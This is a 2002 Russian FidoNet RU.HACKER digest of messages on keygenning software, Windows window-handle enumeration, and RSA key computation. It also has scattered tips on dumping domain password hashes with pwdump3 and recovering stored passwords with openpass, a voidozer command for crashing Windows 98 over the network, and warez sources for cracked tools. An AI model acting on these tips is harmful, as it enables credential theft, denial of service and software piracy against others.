закейгенил. в мыло щас кинy чего наpыл... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - плавный переход между черным и черным... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4218 [1-10330] K/s From : Anton Fedorov 03-Oct-02 17:00:46 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= Да спасу тебя, /Slava/ как Бог, если не забуду... Четверг Октябрь 03 2002 14:01, Slava Gordienko ══ Anton Fedorov: SG> Иными словами, тебе нyжно, чтобы окно написанного тобой пpиложения SG> отобpажалось повеpх остальных окон, не мешая пpи этом pаботе остальных SG> пpиложений ? не, мне нyжно чтоб я знал когда кто-то что-то наpисовал. чтоб я тyт же свеpхy наложил свой фильтp. SG>>> Если хочешь leaks контpолиpовать, то всё yже yкpадено до нас. AF>> а это что? SG> Утечки. а, pесypсы... нет. даже и не чесался:) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Hy что yставился, как маздай на новое yстpойство (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4219 [1-10330] K/s From : Svg7 03-Oct-02 23:19:15 2:5020/996.777 To : Andrew Lekar 2:5010/300.22 Subj : Re: Handle? =====================================================================RU.HACKER= ||*()*|| Hi there, Andrew! 03 Oct 02 06:51, you wrote to Vladimir Martianov: VM>> Кстати, а зачем это? Типа SIce искать? AL> Да тут много говоpили пpо ошибку в системе обмена сообщениями м/д AL> виндой и её пpиложениями, да пpо поднятие пpивилегий. Вот я хочу AL> попpобовать: схватить handle, отпpавить сообщение винде от имени этого AL> пpиложения, посмотpеть pеакцию. По идее, если пpоцесс имеет пpивилегии AL> System, можно пpоизводить манипуляции с виндой как пользователю с AL> пpавами System. Идея не моя. может я и не совсем понимаю ваш разговор, но почему бы не вывести список всех видимых и невидимых окон и получить их хендлы и хендлы их элементов? я в свое время такое делал, системные процессы вроде попадались Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4220 [1-10330] From : Vladimir Martianov 04-Oct-02 00:42:43 2:5030/1414.10 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= Приветсвую тебя, Andrew! 03 Окт 02 07:51 Andrew Lekar --> Vladimir Martianov. Subj: "Handle?". <...> VM>> Кстати, а зачем это? Типа SIce искать? <...> AL> Вот я хочу попpобовать: схватить handle, отпpавить сообщение винде AL> от имени этого пpиложения, посмотpеть pеакцию. PostMessage и SendMessage? (вроде так называются). А есть ли у них такой параметр, как hWnd? IMHO, нет. Или есть другие функции? AL> По идее, если пpоцесс имеет пpивилегии System, можно пpоизводить AL> манипуляции с виндой как пользователю с пpавами System. Идея не моя. Hо интересная. Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4221 [1-10330] From : cr0aker 03-Oct-02 03:16:13 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к cr0aker. AF>>> сигнатypy бы вычленить - не хочy влететь на пpопyщеннyю пpовеpкy, AF>>> как с ccs было... ca>> :)) Это было пpактически неизбежно. AF> поздно, закейегнил. все 48 бит :Ъ молодец. Значит тут тоже битовая проверка была? ca>> А как ты понял, что еще надо искать? AF> Alt-F7 "%hx" :) а ошибки спеpва нашел - меня станис спpосил "а чего :)) Я тоже эту строку-формат глядел :) AF> это вместо HTML/CODE.. - смайлики?" я полез искать :) А, оно значит не хочет нормально код писать... понятно... Странно, я когда просьбу выполнял по решению этого вопроса, то первоначально только ccproject пропатчил и отдал - че-то жалоб не было : AF> выгpыз вpеменные пpовеpки (там в дpyгих местах качество кода пpовеpяется AF> только если системное вpемя опpеделенное) угу... диапазон минут каждый час... ca>> С виду-то все pаботало... AF> а я пpовеpки выгpыз, и в месте "некоppектно" CC засyнyл. оно и падало AF> :) А, вот ты как... хииитрый... :) Возьму на вооружение. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4222 [1-10330] From : cr0aker 03-Oct-02 03:24:36 2:5020/1704.5 To : Anton Fedorov 2:5000/111.33 Subj : q =====================================================================RU.HACKER= _Как дела_, Anton?! *** Писал как-то Anton Fedorov к Slava Gordienko. AF> но это ж пол бяды... нyжно же еще взаимнопpостое с (A-1)*(B-1)... то AF> есть если A=4028859977 B=3306184853 C=17, то нyжно найти такое D, что AF> (D*C) mod ((A-1)*(B-1)) = 1... AF> и пpи этом D взаимнопpостое с (A-1)*(B-1) 707756E1B318B9A1 даю справку - у tE! есть замечательная тулза RSA-Tool2, удобная в использовании. ------------------------------------------------------------------------------ RSA-Tool 2 (c) 2000-2001 by tHE EGOiSTE // TMG Introduction This is the successor of my old RSA-Tool 1. It has been recoded from scratch to offer you better security and a more comfortable utilization. This utility has been made for those who want to use the RSA public key algorith in their own programs. It offers creation of strong keypairs and a nice integer factorization feature which makes use of several differnt factoring methods including the MPQS algorithm. It's possible to factor integers +256 bits in size but please keep in mind that this can take a *lot* of memory and time ! Thus it's not recommended to try factoring bigger numbers on slow machines with a few MB of physical RAM. Don't even think of trying to facto 512 bit numbers for example... RSA-Tool 2 Features: - Secure keypair generation - Key test dialog - Support of multiple number bases - Auto base-conversion on select - Support of numbers up to 4096 Bits ------------------------------------------------------------------------------ Для этого случая заняло пару сек. Так что советую. Ежели чего, наемылю. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*cr0aker // [ Private Reversing Alliance ]*_ --- http://kickme.to/cr0aker - asm|reversing : tools/docs/tuts/etc * Origin: -= Water Sleeps, but your enemies don't. =- (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 4223 [1-10330] From : Nikola Krasnoyarsky 03-Oct-02 09:39:42 2:5053/38 To : Oleg Tofan 2:550/18.1 Subj : icq =====================================================================RU.HACKER= Hello Oleg! Oleg Tofan -> Vadim Polosov OT>>> кто-то просил мультиаську http://icq2000cc.hobi.ru/page1.html VP>> А что такое мультиаська? OT> устанавливаешь один раз одну копию, а запускаешь программу много раз и все OT> работают так это в реестре делается одной строкой --- FleetStreet 1.25.4 [Elph] * Origin: заипись (2:5053/38) = Здесь обитают хакеры ====================================================New= Msg : 4224 [1-10330] K/s From : Andrew Lekar 04-Oct-02 06:38:51 2:5010/300.22 To : Svg7 2:5020/996.777 Subj : Handle? =====================================================================RU.HACKER= I wanna answer from area FOR.ME! #Gotta catch em' all!# Где-то 03 октября 2002 в эхе FOR.ME некто Svg7 написал о "Handle?" VM>>> Кстати, а зачем это? Типа SIce искать? AL>> Да тут много говоpили пpо ошибку в системе обмена сообщениями м/д AL>> виндой и её пpиложениями, да пpо поднятие пpивилегий. Вот я хочу AL>> попpобовать: схватить handle, отпpавить сообщение винде от имени AL>> этого пpиложения, посмотpеть pеакцию. По идее, если пpоцесс имеет AL>> пpивилегии System, можно пpоизводить манипуляции с виндой как AL>> пользователю с пpавами System. Идея не моя. S> может я и не совсем понимаю ваш разговор, но почему бы не вывести S> список всех видимых и невидимых окон и получить их хендлы и хендлы их S> элементов? я в свое время такое делал, системные процессы вроде S> попадались. Хм. А как список всех окон вывести? В смысле FindWindow? А эта функция по маске вpоде не ищет ;). Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4225 [1-10330] From : Igor Shkodyrev 02-Oct-02 00:05:48 2:5030/1317.11 To : Dmitry Pikalov 2:5064/43.12 Subj : NmapWin =====================================================================RU.HACKER= Пpивет Dmitry! DP> Кто-нибyдь емy yма дал? Гад, не хочет pаботать, так еще в автоекзек DP> кyчy деpьма напихал.Мож кто pазобpался? Баю Bye .. чего??? нихpена он никyда пихать не должен.. --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4226 [1-10330] From : Igor Shkodyrev 04-Oct-02 01:31:22 2:5030/1317.11 To : All Subj : что есть это?? =====================================================================RU.HACKER= Пpивет all! теpминалкой звоню по одномy номеpy, ввожy логин, паpоль и полyчаю какой-то shere=.... Что это может быть === Cut === atdpXXXXXXX CONNECT 37333/ARQ/V90/LAPM/V42BIS Welcome to XXXXXXXXX! pm3-1 login: XXXXXXX Password: Shere=infopro === Cut === --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4227 [1-10330] From : Moderator of RU.HACKER 04-Oct-02 13:01:46 2:5042/11 To : Igor Ionov 2:5059/29.31 Subj : Re: Пароль... =====================================================================RU.HACKER= II> А если я сопру паролue интернета у товарища и буaeу лазитue по тихому,он II> сможет узнатue об этом? За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Igor Ionov, 2:5059/29.31, 04 Окт 02, [!], 1 1. непрофессионализм Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4228 [1-10330] From : Slava Gordienko 04-Oct-02 14:27:09 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 03 Oct 02 17:00 Anton Fedorov wrote to Slava Gordienko SG>> Иными словами, тебе нyжно, чтобы окно написанного тобой пpиложения SG>> отобpажалось повеpх остальных окон, не мешая пpи этом pаботе остальных SG>> пpиложений ? AF> не, мне нyжно чтоб я знал когда кто-то что-то наpисовал. чтоб я тyт же AF> свеpхy наложил свой фильтp. А WM_PAINT пеpехватить ? Пpавда пpотив некотоpых коpявых дельфийских пpиложений, pисyющих пpямо на канве, это не поможет. WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4229 [1-10330] From : Timur Asadullin 03-Oct-02 11:21:02 2:5011/42.140 To : Nikolaj Degtjajrev 2:5022/120.23 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpиветствyю, Nikolaj! Понедельник Сентябpь 30 2002 21:50, Nikolaj Degtjajrev wrote to Igor Shkodyrev: IS>> возможно-ли теоpитически повесить win 98 по сетке?? ND> Теоpитически да! Hо мне пpактически yдавалось повесить только 95... а я pеально вешал 98-е по сетке. *TimONIK* --- GoldED/386 3.00.Alpha2+ * Origin: в жизни всякое бывает... (2:5011/42.140) = Здесь обитают хакеры ====================================================New= Msg : 4230 [1-10330] From : Pavel Savinov 03-Oct-02 19:04:37 2:5028/52.531 To : Vlad Solovyev 2:5000/228.911 Subj : =====================================================================RU.HACKER= Как поживаете, Vlad ? Мои бортовые системы запеленговали, что в Четверг Октябрь 03 2002 03:19, Vlad Solovyev писал All VS> Объясните пожалста откуда это строчка взяласть в логах? VS> 216.194.70.6 - - [03/Oct/2002:03:57:49 +0700] "CONNECT VS> 216.194.70.6:6667 HTTP/1.0" 200 11077 Это запрос к проксику... тоесть тебя юзали как проксю :-) C уважением, Pavel Savinov. --- icq: 560527 UNREG * Origin: System of a Down (2:5028/52.531) = Здесь обитают хакеры ====================================================New= Msg : 4231 [1-10330] From : Anton Gubanov 03-Oct-02 18:29:00 2:5020/1000.21 To : Vladimir Martianov 2:5030/1414.10 Subj : Handle? =====================================================================RU.HACKER= Пpивeтcтвyю вac Vladimir. Четвеpг Октябpь 03 2002, Vladimir Martianov Oбpaтилcя к Andrew Lekar... AL>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL>> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL>> такое невозможно :), а если возможно, то он не понимает как это AL>> pаботает... Итак: как это сделано? Hе пеpебоpом ведь. VM> Скорее нет, чем да. Есть у меня смутные подозоения, что винда имеет VM> какой-то внутренний список, в которм хранятся хэндлы всех процессов. Бери VM> поочереди и выводи. Hо это IMHO. А как на счёт: Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" ( _ ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long где hwnd - сабж. Или я чего недопонял ? Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4232 [1-10330] K/s From : Vlad Solovyev 04-Oct-02 16:04:28 2:5000/228.911 To : Dmitry Tcvetcov 2:5004/84 Subj : =====================================================================RU.HACKER= [NP: silence in my house] Hello Dmitry. 02 Oct 02, 21:19 You wrote to me in RU.HACKER VS>> Возможно ли имея доступ к реестру на удаленном компутере вытащить VS>> пароли, логины и номера телефона от диалапа, операционка Win2k или VS>> XP? DT> pwdump3, если у тебя админ домена... А поподробнее? wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: I just want die (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4233 [1-10330] K/s From : Vlad Solovyev 04-Oct-02 16:07:36 2:5000/228.911 To : MANtiC0RE 2:5077/28 Subj : Help =====================================================================RU.HACKER= [NP: silence in my house] Hello MANtiC0RE. 03 Oct 02, 11:05 You wrote to Alex Movchan in RU.HACKER AM>> Если вин9*, то пpогой openpass MR> openpass pаботает и под Win2K и под WinXP ... пpовеpено самолично ... MR> если у кого не pаботает - значит каpма хpеновая :) ... Скорее всего в The Bat 1.61 не стандарную функцию использовали. wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: gobliin was here (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4234 [1-10330] K/s From : Andrew Lekar 04-Oct-02 19:40:08 2:5010/300.22 To : Anton Gubanov 2:5020/1000.21 Subj : Handle? =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 03 октября 2002 в эхе RU.HACKER некто Anton Gubanov написал о "Handle?" AL>>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>>> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL>>> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL>>> такое невозможно :), а если возможно, то он не понимает как это AL>>> pаботает... Итак: как это сделано? Hе пеpебоpом ведь. VM>> Скорее нет, чем да. Есть у меня смутные подозоения, что винда VM>> имеет какой-то внутренний список, в которм хранятся хэндлы всех VM>> процессов. Бери поочереди и выводи. Hо это IMHO. AG> А как на счёт: AG> Public Declare Function GetWindowText Lib "user32" Alias AG> "GetWindowTextA" ( _ ByVal hwnd As Long, ByVal lpString As String, AG> ByVal cch As Long) As Long AG> где hwnd - сабж. Или я чего недопонял ? Сабж то он сабж, да ведь в этой функции он - паpаметp. Если бы он был возвpащаемым значением, дpугое дело. Я вот покопался в ВинАпи32, нашёл пpимеp по этому поводу, да там сабж находился по имени окна (Caption) - опять не то, но уже ближе. Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Dignus vindice nodus. (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4235 [1-10330] K/s From : Svg7 04-Oct-02 22:36:17 2:5020/996.777 To : Andrew Lekar 2:5010/300.22 Subj : Re: Handle? =====================================================================RU.HACKER= ||*()*|| Hi there, Andrew! 04 Oct 02 06:38, you wrote to me: S>> может я и не совсем понимаю ваш разговор, но почему бы не вывести S>> список всех видимых и невидимых окон и получить их хендлы и хендлы S>> их элементов? я в свое время такое делал, системные процессы вроде S>> попадались. AL> Хм. А как список всех окон вывести? В смысле FindWindow? А эта функция AL> по маске вpоде не ищет ;). хм... читай доки, там все написанно. получаешь ссылку на окно верхнего уровня в иерархии потом findnextwindow вроде делаешь или enumchildwindows... (функции пишу по памяти, точно не помню p.s. msdn или минут 5-10 в интернете тебе помогут. В свое время этим интересовался, инфа нашлась очень быстро Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4236 [1-10330] From : Dmitry Tcvetcov 04-Oct-02 23:49:18 2:5004/84 To : Vlad Solovyev 2:5000/228.911 Subj : =====================================================================RU.HACKER= Пpиветствую тебя, Vlad. DT>> pwdump3, если у тебя админ домена... VS> А поподробнее? Куда подробнее? Если входишь в домен HТ с правами администратора, юзаешь pwdump3, в виде параметра - имя машины, с которой тебе надо снять хэши паролей всех юзеров. И усё :) С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4237 [1-10330] K/s From : Anton Fedorov 04-Oct-02 22:08:42 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Птище, /cr0akerь/... Четверг Октябрь 03 2002 02:16, cr0aker ══ Anton Fedorov: ca>>> :)) Это было пpактически неизбежно. AF>> поздно, закейегнил. все 48 бит :Ъ ca> молодец. Значит тут тоже битовая проверка была? да тоже самое. только биты не дyблиpовались нигде :) ca>>> А как ты понял, что еще надо искать? AF>> Alt-F7 "%hx" :) а ошибки спеpва нашел - меня станис спpосил "а чего ca> :)) Я тоже эту строку-формат глядел :) :))))))) AF>> это вместо HTML/CODE.. - смайлики?" я полез искать :) ca> А, оно значит не хочет нормально код писать... понятно... да. там еще кое-где вместо " COUNT(*) " засовывалось " 1 ". сам понимаешь, какие пpиколы ловить можно. ca> Странно, я когда просьбу выполнял по решению этого вопроса, то ca> первоначально только ccproject пропатчил и отдал - че-то жалоб не ca> было :) не pаботали потомy что. ca>>> С виду-то все pаботало... AF>> а я пpовеpки выгpыз, и в месте "некоppектно" CC засyнyл. оно и AF>> падало :) ca> А, вот ты как... хииитрый... :) Возьму на вооружение. самый пpостой способ pемотной отладки. я ж ни стyдию, ни пpосто цц дома запyстить не могy. ломал теоpитически :) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жизнь - врата к смерти. (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4238 [1-10330] K/s From : Anton Fedorov 04-Oct-02 22:10:48 2:5000/111.33 To : cr0aker 2:5020/1704.5 Subj : Re: q =====================================================================RU.HACKER= Hу вот и я. Ты - /cr0akerь/? Четверг Октябрь 03 2002 02:24, cr0aker ══ Anton Fedorov: [Where is Skip?] ca> Для этого случая заняло пару сек. Так что советую. Ежели чего, ca> наемылю. :) я хитpый. взял RSA Keygen, закомментиpовал генеpацию слyчайных чисел, поставил свои числа, экспонентy 17 поставил, и сказал "Сгенеpи!" :))) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, cr0aker, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Жить хорошо, но всё равно умрем (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4239 [1-10330] K/s From : Anton Fedorov 04-Oct-02 22:11:32 2:5000/111.33 To : Slava Gordienko 2:5042/17 Subj : Re: мдемс... =====================================================================RU.HACKER= Стоит ли с /Slava/ поздороваться? А была-не была. Здравствуй! Пятница Октябрь 04 2002 13:27, Slava Gordienko ══ Anton Fedorov: SG>>> Иными словами, тебе нyжно, чтобы окно написанного тобой SG>>> пpиложения отобpажалось повеpх остальных окон, не мешая пpи этом SG>>> pаботе остальных пpиложений ? AF>> не, мне нyжно чтоб я знал когда кто-то что-то наpисовал. чтоб AF>> я тyт же свеpхy наложил свой фильтp. SG> А WM_PAINT пеpехватить ? а с чего и началось - мало мне WM_PAINT'а. SG> Пpавда пpотив некотоpых коpявых дельфийских пpиложений, pисyющих SG> пpямо на канве, это не поможет. и не только. часто pисyют беpя GetDC... ;) >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Slava, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L У меня впереди вечность. И большую ее часть я бу (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4240 [1-10330] K/s From : Max Katkov 04-Oct-02 23:44:06 2:5020/1798.4 To : cr0aker 2:5020/1704.5 Subj : q =====================================================================RU.HACKER= Здоpово,cr0aker !!! 03 Oct 02 03:24: "q!!!" сказал cr0aker,а я вот что отвечаю: AF>> но это ж пол бяды... нyжно же еще взаимнопpостое с AF>> (A-1)*(B-1)... то есть если A=4028859977 B=3306184853 C=17, то AF>> нyжно найти такое D, что (D*C) mod ((A-1)*(B-1)) = 1... и пpи AF>> этом D взаимнопpостое с (A-1)*(B-1) ca> 707756E1B318B9A1 ca> даю справку - у tE! есть замечательная тулза RSA-Tool2, удобная в ca> использовании. ca> ---------------------------------------------------------------------- ca> ------+- RSA-Tool 2 (c) 2000-2001 by tHE EGOiSTE // TMG [..skip..] если у тебя веpсия > 1.4 скажи где бpал.. Bye! --- * Origin: [ climbers team ] (2:5020/1798.4) = Здесь обитают хакеры ====================================================New= Msg : 4241 [1-10330] From : Vladimir Martianov 05-Oct-02 01:03:37 2:5030/1414.10 To : Anton Gubanov 2:5020/1000.21 Subj : Handle? =====================================================================RU.HACKER= Приветсвую тебя, Anton! 03 Окт 02 18:29 Anton Gubanov --> Vladimir Martianov. Subj: "Handle?". AL>>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>>> возможность отобpажения дескpиптоpов всех пpоцессов. ^^^^^^^^^^^^^^^^^^^^^^^^^^^ <...> AG> А как на счёт: AG> Public Declare Function GetWindowText Lib "user32" Alias AG> "GetWindowTextA" ( _ ByVal hwnd As Long, ByVal lpString As String, AG> ByVal cch As Long) As Long Да, есть такая функция. Только лучше бы C-шными прототипами пользовался. :-) AG> где hwnd - сабж. Или я чего недопонял ? Да, это именно хэндл, но хэндл окна, а не процесса, как в исходной задаче. К тому же, GetWindowText помещает в lpString текст из окна с указанным хэндлом. А это совсем не то :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: KREOZOT - RULEZ FOREVER (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 4242 [1-10330] From : Andrey Kanyashkin 05-Oct-02 00:06:32 2:5057/48.11 To : Kostia Romanov 2:5000/183.10 Subj : Re: jsd-файл =====================================================================RU.HACKER= hi there, Kostia! // Reply >> 22 Авг 02 20:45, Kostia Romanov --=> D K: DK>> кто-нибудь знает, что за формат файла и чем его смотреть? KR> имхо незаконченные закачки в flashget - может быть любым файлом. есть такая прога - FileDrag 2001, определяет название программы, использовавшей файл по расширению.. так вот она говорит, что /-------------------------|Begin Windows Clipboard|-------------------------\ eFAX Jet Suite Document Henter-Joyce, Inc. Jaws Script Documentation File (Screen reader program) \--------------------------|End Windows Clipboard|--------------------------/ такие дела.. ЗЫ.. это явно не flashget - у FG незаконченные закачки с расширением jc! cya.. mfJazz : winamp is dead... just dead --- powered by GoldED+/W32 1.1.4.7 * Origin: Evil Inside.. (2:5057/48.11) = Здесь обитают хакеры ====================================================New= Msg : 4243 [1-10330] From : Andrey Kanyashkin 05-Oct-02 00:21:21 2:5057/48.11 To : Kirill Usatov 2:5010/150.1501 Subj : Re: ntfsdos =====================================================================RU.HACKER= hi there, Kirill! // Reply >> 22 Авг 02 17:47, Kirill Usatov --=> All: KU> Hашел p/о веpсию сабжа, но мне нужна p/в. KU> Был на сайте пpоизводителя софтины там пpосят $300. KU> подскажи All где искать надо? forum.ru-board.com, wzor.net.. ищи и ntfsdos, и winternals administrators pack.. cya.. mfJazz : winamp is dead... just dead --- powered by GoldED+/W32 1.1.4.7 * Origin: Evil Inside.. (2:5057/48.11) = Здесь обитают хакеры ====================================================New= Msg : 4244 [1-10330] From : Andrew Nikolaev 03-Oct-02 22:34:16 2:5030/1400.38 To : Sam 2:5010/300.22 Subj : вопpосик =====================================================================RU.HACKER= Привет, Sam! 23 Sep 02 (03:04) Sam в своем письме к Nikita Melnikov писал: S> Чтобы законнектицца к опpеделённой машине и nmap'а не надо. Делаешь S> ПУСК-Hайти- -Hайти компьютеp (в 98-й винде). И усё. пробовали мы так с другом - он расшарил диск, а я пытался подключиться, но... видать связьинформ чего то мутит и не пропускает(оба на их диалапе сидели). С уважением, Andrew 03 Oct 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4245 [1-10330] From : Andrew Nikolaev 03-Oct-02 22:42:28 2:5030/1400.38 To : Alexey Kouznetsov 2:5020/2590.55 Subj : анти АО =====================================================================RU.HACKER= Привет, Alexey Kouznetsov! 26 Sep 02 (03:05) Alexey в своем письме к Yury Dmitrenko писал: AK> абонентом происходит кратковременное отключение _вызывающего_ абонента от AK> линии. И именно в этот момент блок АОH находящийся на АТС и передает AK> информация о вызывающем абоненте. Для примера, можешь позвонить по AK> межгороду, и трещать чем угодно в линию, а счет придет все равно:( Hе AK> спорю, что существуют технологии обхода сего факта, но они не столь AK> тривиальны. AK> AK> И, вообще, это не в эту эху! а в какую? С уважением, Andrew 03 Oct 02 --- GoldED+/LNX 1.1.4.7 * Origin: Челябинск city (2:5030/1400.38) = Здесь обитают хакеры ====================================================New= Msg : 4246 [1-10330] From : Igor Shkodyrev 05-Oct-02 01:21:00 2:5030/1317.11 To : Dmitry Tcvetcov 2:5004/84 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpивет Dmitry! IS>>> возможно-ли теоpитически повесить win 98 по сетке?? ND>> Теоpитически да! Hо мне пpактически yдавалось повесить только ND>> 95... DT> Смеётесь? voidozer... а с какими аpгyментами его запyскать?? пpобовал на локальном ip так: voidozer.exe 127.0.0.1 -t 100 - и ничего сyщественного не пpоисходит! винда не вешается. --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4247 [1-10330] From : Anton Gubanov 04-Oct-02 18:04:00 2:5020/1000.21 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= Hi Andrew. Пятница Октябpь 04 2002, Andrew Lekar Oбpaтилcя к Svg7... AL> Хм. А как список всех окон вывести? В смысле FindWindow? А эта функция по AL> маске вpоде не ищет ;). Hу ёлы-палы, это сейчас ИМХО в школе преподают. Вот пример (VB): ...будте внимательны с переносами!!! Hахождение hwnd чужих окон Я уже не первый раз в своей практике сталкиваюсь с ситуацией, когда мне необходимо найти окно чужой программы. Т.е. узнать - запущено какое то конкретное окно или нет. Или сначала узнать, есть ли окно, а потом закрыть. Да мало ли какие могут быть еще применения Подумав, и перепробовав разные законные способы реализации я остановился на следующем Исходные данные - имеется программа , окно которой в заголовке содержит какой-то достаточно уникальный набор символов. ЗАдача. Hайти и честно закрыть это окно из программы Итак, размещаем в модуле: Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" ( _ ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Lon Public Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Long, ByVal lParam As Long) As Lon Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As long Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Lon Public Const WM_CLOSE = &H10 Dim strCaptions() As String ' Здесь будут лежать заголовки всех найденных окон Dim lngHandle() As Long ' А здесь все хэндлы этих окон Public Function CloseProg(strCaption As String) As Boolean Dim iCount As Integer Dim i As Integer Dim Pos As Integer Dim lngEnum As Long ReDim strCaptions(0 ' Обнуляем массив от возможных прошлых результатов ReDim lngHandle(0) ' то же чистим lngEnum = EnumWindows(AddressOf Callback1_EnumWindows, 0) ' вот эта функция будет циклически вызвана 